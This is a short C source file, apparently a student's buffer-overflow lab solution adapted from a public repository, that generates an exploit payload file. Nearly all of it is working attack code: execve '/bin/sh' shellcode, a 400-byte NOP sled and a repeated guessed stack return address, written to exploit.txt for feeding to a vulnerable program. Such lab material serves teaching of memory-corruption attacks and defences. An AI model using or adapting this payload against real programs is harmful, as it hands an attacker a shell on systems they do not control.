/***************************************** ** File: exploit.c ** Author: RJ Joyce ** Date: 9/19/2018 ** E-mail: joyce8@umbc.edu ** *****************************************/ #include #include #include /* Adapted from https://github.com/npapernot/buffer-overflow-attack */ char shellcode[] = "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; int main() { /* Allocate space for buff */ /* I chose 100 bytes more than the one we're trying to overflow */ int buff_len = 601; char *buff = malloc(buff_len); if(buff == NULL){ exit(1); } /* Fill the buffer with the address we found using gdb */ long stack_ptr = 0xbffff4e0; /* You might need to try some different offsets */ long offset = 0x200; stack_ptr -= offset; /* Fill the entire buffer with the guessed address */ int i; for(i = 0; i < buff_len; i += 4){ long* temp_ptr = (long*) (buff + i); *temp_ptr = stack_ptr; } /* Overwrite the first half of the buffer with the NOP sled */ for(i = 0; i < 400; i++){ buff[i] = 0x90; /* NOP opcode is 0x90 */ } /* Put the shellcode in the buffer after the NOP sled */ strncpy((char*)(buff + 400), shellcode, strlen(shellcode)); /* * At this point, buff looks like this: * N = NOP, S = Shellcode, R = Return address * NNNNNNNNNNNNNNNNNNNNSSSSSSSSRRRRRRRRRRRRR */ /* Null terminate the buffer so fputs works */ buff[buff_len-1] = '\0'; /* Write buff to exploit.txt */ FILE *fp = fopen("exploit.txt", "wb"); if(fp != NULL){ fputs(buff, fp); } return 0; }